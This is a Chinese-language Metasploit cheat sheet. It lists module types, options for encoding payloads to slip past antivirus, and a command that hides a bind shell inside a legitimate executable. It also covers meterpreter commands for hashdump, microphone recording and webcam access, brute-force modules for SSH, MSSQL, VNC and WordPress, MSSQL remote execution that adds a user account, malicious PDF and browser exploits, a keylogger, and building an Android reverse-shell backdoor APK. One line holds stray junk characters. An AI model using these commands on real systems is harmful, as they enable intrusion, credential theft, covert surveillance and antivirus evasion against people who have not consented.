技术功能模块
exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法
payload:成功exploit之后,真正在目标系统执行的代码或指令
auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块
encoders:对payload进行加密,躲避av检查的模块
nops:提高payload稳定性及维持大小
generate常用选项解释:
-b 去掉坏字符,例如:-b ‘\x00\xff’
-e 设置编码方式,可以使用show encoders命令查看所有编码方式
-f 输出格式,不设置默认为ruby语言。例如-f c或-f exe
-i 设置编码次数,一般用作多次编码免杀
-k 保持源模版行为,并将payload作为一个线程注入到一个进程中,常和-x配合使用
-o 输出文件名
-x 定义一个文件作为模版
use payload/windows/shell_bind_tcp
generate -b ‘\x00\xff’ -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o 1.exe
meterpreter命令
background:返回 pwd lpwd ls cat execute:执行程序 getuid hashdump ps record_mic:记录麦克风 webcam_list:读取摄像头
主机扫描模块:auxiliary/scanner/discovery/arp_sweep
端口扫描模块:auxiliary/scanner/portscan/syn
密码嗅探 : use auxiliary/sniffer/psnuffle -支持从pcap抓包文件中提取密码,目前只支持pop3,imap,ftp,http get协议.
SNMP扫描
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers (windows)
use auxiliary/scanner/snmp/snmp_enumshares (windows)aSASD//AS
SMB版本扫描
use auxiliary/scanner/smb/smb_version
扫描命名管道,判断SMB服务类型(账号密码)
use auxiliary/scanner/smb/pipe_auditor
扫描通过SMB管道可以访问的RCERPC服务
use auxiliary/scanner/smb/pipe_dcerpc_auditor
SMB共享枚举(帐号,密码)
use auxiliary/scanner/smb/smb_enumshares
SMB用户枚举(帐号,密码)
use auxiliary/scanner/smb/smb_enumusers
SID枚举(帐号,密码)
use auxiliary/scanner/smb/smb_lookupsid
SSH版本扫描
use auxiliary/scanner/ssh/ssh_version
SSH密码爆破
use auxiliary/scanner/ssh/ssh_login
SSH公钥登录
use auxiliary/scanner/ssh/ssh_login_pubkey
windows缺少的补丁
use post/windows/gather/enum_patches
mssql扫描端口
tcp1433(动态端口)、udp1434(查询tcp端口号)
use auxiliary/scanner/mssql/mssql_ping
爆破mssql密码
use auxiliary/scanner/mssql/mssql_login
远程执行代码
use auxiliary/scanner/mssql/mssql_exec
set CMD net user user pass /ADD
ftp版本扫描
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ftp/ftp_login
弱点扫描
vnc密码破解
use auxiliary/scanner/vnc/vnc_login
vnc 无密码访问
use auxiliary/scanner/vnc/vnc_none_auth
RDP远程桌面漏洞
use auxiliary/scanner/rdp/ms12_020_check
检查不会造成dos攻击
设备后门
use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor
VMware ESXI 密码爆破
use auxiliary/scanner/vmware/vmauthd_login
use auxiliary/scanner/vmware/vmware_enum_vms
利用WEB API
use auxiliary/admin/vmware/poweron_vm
http弱点扫描
过期证书:use auxiliary/scanner/http/cert
显示目录及文件:use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/files_dir
webdav unicode编码身份绕过:use auxiliary/scanner/http/dir_webdav_unicode_bypass
tomcat管理登录:use auxiliary/scanner/http/tomcat_mgr_login
基于http方法的身份验证绕过:use auxiliary/scanner/http/verb_auth_bypass
wordpress密码爆破:use auxiliary/scanner/http/wordpress_login_enum
set URI/wordpress/wp-login.php
利用Acrobat Reader漏洞执行payload
构造PDF文件:exploit/windows/fileformat/adobe_utilprintf
构造恶意网站:exploit/windows/browser/adobe_utilprintf
Meterpreter
use priv
run post/windows/capture/keylog_recorder
利用flash插件漏洞执行payload
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2
利用IE浏览器漏洞执行payload
use exploit/windows/browser/ms14_064_ole_code_execution (windowsxp)
利用JRE漏洞执行payload
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types
生成android后门程序
use payload/android/meterpreter/reverse_tcp
generate -f a.apk -p android -t raw